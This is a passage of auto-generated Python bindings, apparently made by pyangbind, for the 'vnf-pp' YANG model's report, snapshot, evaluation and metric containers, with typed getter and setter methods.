path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__scalar = t if hasattr(self, '_set'): self._set() def _unset_scalar(self): self.__scalar = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="scalar", parent=self, choice=('value', 'scalar'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_series(self): """ Getter method for series, mapped from YANG variable /reports/snapshots/evaluations/metrics/series (list) YANG Description: A list of key/values, e.g., a timeseries. """ return self.__series def _set_series(self, v, load=False): """ Setter method for series, mapped from YANG variable /reports/snapshots/evaluations/metrics/series (list) If this variable is read-only (config: false) in the source YANG file, then _set_series is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_series() directly. YANG Description: A list of key/values, e.g., a timeseries. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=YANGListType("key",yc_series_vnf_pp__reports_snapshots_evaluations_metrics_series, yang_name="series", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='key', extensions=None, choice=False), is_container='list', yang_name="series", parent=self, choice=('value', 'series'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """series must be of a type compatible with list""", 'defined-type': "list", 'generated-type': """YANGDynClass(base=YANGListType("key",yc_series_vnf_pp__reports_snapshots_evaluations_metrics_series, yang_name="series", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='key', extensions=None, choice=False), is_container='list', yang_name="series", parent=self, choice=('value', 'series'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True)""", }) self.__series = t if hasattr(self, '_set'): self._set() def _unset_series(self): self.__series = YANGDynClass(base=YANGListType("key",yc_series_vnf_pp__reports_snapshots_evaluations_metrics_series, yang_name="series", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='key', extensions=None, choice=False), is_container='list', yang_name="series", parent=self, choice=('value', 'series'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) name = __builtin__.property(_get_name, _set_name) unit = __builtin__.property(_get_unit, _set_unit) type = __builtin__.property(_get_type, _set_type) scalar = __builtin__.property(_get_scalar, _set_scalar) series = __builtin__.property(_get_series, _set_series) __choices__ = {'value': {'scalar': ['scalar'], 'series': ['series']}} _pyangbind_elements = OrderedDict([('name', name), ('unit', unit), ('type', type), ('scalar', scalar), ('series', series), ]) class yc_evaluations_vnf_pp__reports_snapshots_evaluations(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module vnf-pp - based on the path /reports/snapshots/evaluations. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: The list of evaluations contained in a single snapshot Test. """ __slots__ = ('_path_helper', '_extmethods', '__id','__instance','__repeat','__source','__timestamp','__metrics','__error',) _yang_name = 'evaluations' _pybind_generated_by = 'container' def __init__(self, *args, **kwargs): self._path_helper = kwargs.get("path_helper", False) extmethods = kwargs.pop("extmethods", None) if extmethods is False: self._extmethods = False elif extmethods is not None and isinstance(extmethods, dict): self._extmethods = extmethods elif hasattr(self, "_parent"): extmethods = getattr(self._parent, "_extmethods", None) self._extmethods = extmethods else: self._extmethods = False self.__id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__instance = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="instance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True) self.__repeat = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="repeat", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True) self.__source = YANGDynClass(base=yc_source_vnf_pp__reports_snapshots_evaluations_source, is_container='container', yang_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='container', is_config=True) self.__timestamp = YANGDynClass(base=yc_timestamp_vnf_pp__reports_snapshots_evaluations_timestamp, is_container='container', yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='container', is_config=True) self.__metrics = YANGDynClass(base=YANGListType("name",yc_metrics_vnf_pp__reports_snapshots_evaluations_metrics, yang_name="metrics", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions=None), is_container='list', yang_name="metrics", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) self.__error = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="error", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path()+[self._yang_name] else: return ['reports', 'snapshots', 'evaluations'] def _get_id(self): """ Getter method for id, mapped from YANG variable /reports/snapshots/evaluations/id (string) YANG Description: The evaluation unique identifier. """ return self.__id def _set_id(self, v, load=False): """ Setter method for id, mapped from YANG variable /reports/snapshots/evaluations/id (string) If this variable is read-only (config: false) in the source YANG file, then _set_id is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_id() directly. YANG Description: The evaluation unique identifier. """ parent = getattr(self, "_parent", None) if parent is not None and load is False: raise AttributeError("Cannot set keys directly when" + " within an instantiated list") if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """id must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__id = t if hasattr(self, '_set'): self._set() def _unset_id(self): self.__id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_instance(self): """ Getter method for instance, mapped from YANG variable /reports/snapshots/evaluations/instance (uint32) YANG Description: The unique identifier of the parallel instance of the prober/listener that was executed and created the evaluation. """ return self.__instance def _set_instance(self, v, load=False): """ Setter method for instance, mapped from YANG variable /reports/snapshots/evaluations/instance (uint32) If this variable is read-only (config: false) in the source YANG file, then _set_instance is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_instance() directly. YANG Description: The unique identifier of the parallel instance of the prober/listener that was executed and created the evaluation. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="instance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """instance must be of a type compatible with uint32""", 'defined-type': "uint32", 'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="instance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True)""", }) self.__instance = t if hasattr(self, '_set'): self._set() def _unset_instance(self): self.__instance = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="instance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True) def _get_repeat(self): """ Getter method for repeat, mapped from YANG variable /reports/snapshots/evaluations/repeat (uint32) YANG Description: The unique identifier of the prober/listener repeatition instance was executed and created the evaluation. """ return self.__repeat def _set_repeat(self, v, load=False): """ Setter method for repeat, mapped from YANG variable /reports/snapshots/evaluations/repeat (uint32) If this variable is read-only (config: false) in the source YANG file, then _set_repeat is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_repeat() directly. YANG Description: The unique identifier of the prober/listener repeatition instance was executed and created the evaluation. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="repeat", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """repeat must be of a type compatible with uint32""", 'defined-type': "uint32", 'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="repeat", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True)""", }) self.__repeat = t if hasattr(self, '_set'): self._set() def _unset_repeat(self): self.__repeat = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="repeat", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True) def _get_source(self): """ Getter method for source, mapped from YANG variable /reports/snapshots/evaluations/source (container) YANG Description: The details regarding the source of the evaluation. """ return self.__source def _set_source(self, v, load=False): """ Setter method for source, mapped from YANG variable /reports/snapshots/evaluations/source (container) If this variable is read-only (config: false) in the source YANG file, then _set_source is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_source() directly. YANG Description: The details regarding the source of the evaluation. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=yc_source_vnf_pp__reports_snapshots_evaluations_source, is_container='container', yang_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='container', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """source must be of a type compatible with container""", 'defined-type': "container", 'generated-type': """YANGDynClass(base=yc_source_vnf_pp__reports_snapshots_evaluations_source, is_container='container', yang_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='container', is_config=True)""", }) self.__source = t if hasattr(self, '_set'): self._set() def _unset_source(self): self.__source = YANGDynClass(base=yc_source_vnf_pp__reports_snapshots_evaluations_source, is_container='container', yang_name="source", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='container', is_config=True) def _get_timestamp(self): """ Getter method for timestamp, mapped from YANG variable /reports/snapshots/evaluations/timestamp (container) YANG Description: Timestamps of the procedures that realized the extraction of the evaluation. """ return self.__timestamp def _set_timestamp(self, v, load=False): """ Setter method for timestamp, mapped from YANG variable /reports/snapshots/evaluations/timestamp (container) If this variable is read-only (config: false) in the source YANG file, then _set_timestamp is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_timestamp() directly. YANG Description: Timestamps of the procedures that realized the extraction of the evaluation. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=yc_timestamp_vnf_pp__reports_snapshots_evaluations_timestamp, is_container='container', yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='container', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """timestamp must be of a type compatible with container""", 'defined-type': "container", 'generated-type': """YANGDynClass(base=yc_timestamp_vnf_pp__reports_snapshots_evaluations_timestamp, is_container='container', yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='container', is_config=True)""", }) self.__timestamp = t if hasattr(self, '_set'): self._set() def _unset_timestamp(self): self.__timestamp = YANGDynClass(base=yc_timestamp_vnf_pp__reports_snapshots_evaluations_timestamp, is_container='container', yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='container', is_config=True) def _get_metrics(self): """ Getter method for metrics, mapped from YANG variable /reports/snapshots/evaluations/metrics (list) YANG Description: List of metrics obtained from a single evaluation. """ return self.__metrics def _set_metrics(self, v, load=False): """ Setter method for metrics, mapped from YANG variable /reports/snapshots/evaluations/metrics (list) If this variable is read-only (config: false) in the source YANG file, then _set_metrics is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_metrics() directly. YANG Description: List of metrics obtained from a single evaluation. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=YANGListType("name",yc_metrics_vnf_pp__reports_snapshots_evaluations_metrics, yang_name="metrics", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions=None), is_container='list', yang_name="metrics", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """metrics must be of a type compatible with list""", 'defined-type': "list", 'generated-type': """YANGDynClass(base=YANGListType("name",yc_metrics_vnf_pp__reports_snapshots_evaluations_metrics, yang_name="metrics", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions=None), is_container='list', yang_name="metrics", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True)""", }) self.__metrics = t if hasattr(self, '_set'): self._set() def _unset_metrics(self): self.__metrics = YANGDynClass(base=YANGListType("name",yc_metrics_vnf_pp__reports_snapshots_evaluations_metrics, yang_name="metrics", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='name', extensions=None), is_container='list', yang_name="metrics", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) def _get_error(self): """ Getter method for error, mapped from YANG variable /reports/snapshots/evaluations/error (string) YANG Description: Error, if existent, when obtaining evaluation. """ return self.__error def _set_error(self, v, load=False): """ Setter method for error, mapped from YANG variable /reports/snapshots/evaluations/error (string) If this variable is read-only (config: false) in the source YANG file, then _set_error is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_error() directly. YANG Description: Error, if existent, when obtaining evaluation. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="error", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """error must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="error", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__error = t if hasattr(self, '_set'): self._set() def _unset_error(self): self.__error = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="error", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) id = __builtin__.property(_get_id, _set_id) instance = __builtin__.property(_get_instance, _set_instance) repeat = __builtin__.property(_get_repeat, _set_repeat) source = __builtin__.property(_get_source, _set_source) timestamp = __builtin__.property(_get_timestamp, _set_timestamp) metrics = __builtin__.property(_get_metrics, _set_metrics) error = __builtin__.property(_get_error, _set_error) _pyangbind_elements = OrderedDict([('id', id), ('instance', instance), ('repeat', repeat), ('source', source), ('timestamp', timestamp), ('metrics', metrics), ('error', error), ]) class yc_snapshots_vnf_pp__reports_snapshots(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module vnf-pp - based on the path /reports/snapshots. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: List of snapshots contained in a single report. """ __slots__ = ('_path_helper', '_extmethods', '__id','__trial','__origin','__evaluations','__timestamp','__error',) _yang_name = 'snapshots' _pybind_generated_by = 'container' def __init__(self, *args, **kwargs): self._path_helper = kwargs.get("path_helper", False) extmethods = kwargs.pop("extmethods", None) if extmethods is False: self._extmethods = False elif extmethods is not None and isinstance(extmethods, dict): self._extmethods = extmethods elif hasattr(self, "_parent"): extmethods = getattr(self._parent, "_extmethods", None) self._extmethods = extmethods else: self._extmethods = False self.__id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__trial = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="trial", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True) self.__origin = YANGDynClass(base=yc_origin_vnf_pp__reports_snapshots_origin, is_container='container', yang_name="origin", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='container', is_config=True) self.__evaluations = YANGDynClass(base=YANGListType("id",yc_evaluations_vnf_pp__reports_snapshots_evaluations, yang_name="evaluations", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="evaluations", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) self.__timestamp = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__error = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="error", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path()+[self._yang_name] else: return ['reports', 'snapshots'] def _get_id(self): """ Getter method for id, mapped from YANG variable /reports/snapshots/id (string) YANG Description: The snapshot unique identifier. """ return self.__id def _set_id(self, v, load=False): """ Setter method for id, mapped from YANG variable /reports/snapshots/id (string) If this variable is read-only (config: false) in the source YANG file, then _set_id is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_id() directly. YANG Description: The snapshot unique identifier. """ parent = getattr(self, "_parent", None) if parent is not None and load is False: raise AttributeError("Cannot set keys directly when" + " within an instantiated list") if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """id must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__id = t if hasattr(self, '_set'): self._set() def _unset_id(self): self.__id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_trial(self): """ Getter method for trial, mapped from YANG variable /reports/snapshots/trial (uint32) YANG Description: The identifier of the trial when the snapshot was obtained. """ return self.__trial def _set_trial(self, v, load=False): """ Setter method for trial, mapped from YANG variable /reports/snapshots/trial (uint32) If this variable is read-only (config: false) in the source YANG file, then _set_trial is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_trial() directly. YANG Description: The identifier of the trial when the snapshot was obtained. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="trial", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """trial must be of a type compatible with uint32""", 'defined-type': "uint32", 'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="trial", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True)""", }) self.__trial = t if hasattr(self, '_set'): self._set() def _unset_trial(self): self.__trial = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="trial", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='uint32', is_config=True) def _get_origin(self): """ Getter method for origin, mapped from YANG variable /reports/snapshots/origin (container) YANG Description: The detailed origin of the snapshot. """ return self.__origin def _set_origin(self, v, load=False): """ Setter method for origin, mapped from YANG variable /reports/snapshots/origin (container) If this variable is read-only (config: false) in the source YANG file, then _set_origin is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_origin() directly. YANG Description: The detailed origin of the snapshot. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=yc_origin_vnf_pp__reports_snapshots_origin, is_container='container', yang_name="origin", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='container', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """origin must be of a type compatible with container""", 'defined-type': "container", 'generated-type': """YANGDynClass(base=yc_origin_vnf_pp__reports_snapshots_origin, is_container='container', yang_name="origin", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='container', is_config=True)""", }) self.__origin = t if hasattr(self, '_set'): self._set() def _unset_origin(self): self.__origin = YANGDynClass(base=yc_origin_vnf_pp__reports_snapshots_origin, is_container='container', yang_name="origin", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='container', is_config=True) def _get_evaluations(self): """ Getter method for evaluations, mapped from YANG variable /reports/snapshots/evaluations (list) YANG Description: The list of evaluations contained in a single snapshot Test. """ return self.__evaluations def _set_evaluations(self, v, load=False): """ Setter method for evaluations, mapped from YANG variable /reports/snapshots/evaluations (list) If this variable is read-only (config: false) in the source YANG file, then _set_evaluations is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_evaluations() directly. YANG Description: The list of evaluations contained in a single snapshot Test. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=YANGListType("id",yc_evaluations_vnf_pp__reports_snapshots_evaluations, yang_name="evaluations", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="evaluations", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """evaluations must be of a type compatible with list""", 'defined-type': "list", 'generated-type': """YANGDynClass(base=YANGListType("id",yc_evaluations_vnf_pp__reports_snapshots_evaluations, yang_name="evaluations", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="evaluations", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True)""", }) self.__evaluations = t if hasattr(self, '_set'): self._set() def _unset_evaluations(self): self.__evaluations = YANGDynClass(base=YANGListType("id",yc_evaluations_vnf_pp__reports_snapshots_evaluations, yang_name="evaluations", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='id', extensions=None), is_container='list', yang_name="evaluations", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='list', is_config=True) def _get_timestamp(self): """ Getter method for timestamp, mapped from YANG variable /reports/snapshots/timestamp (string) YANG Description: Time (date, hour, minute, second) when the snapshot was created. """ return self.__timestamp def _set_timestamp(self, v, load=False): """ Setter method for timestamp, mapped from YANG variable /reports/snapshots/timestamp (string) If this variable is read-only (config: false) in the source YANG file, then _set_timestamp is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_timestamp() directly. YANG Description: Time (date, hour, minute, second) when the snapshot was created. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """timestamp must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="timestamp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__timestamp = t if hasattr(self, '_set'): self._set() def _unset_timestamp(self): self.__timestamp = YANGDynClass(base=six.text_type, is_leaf=True, 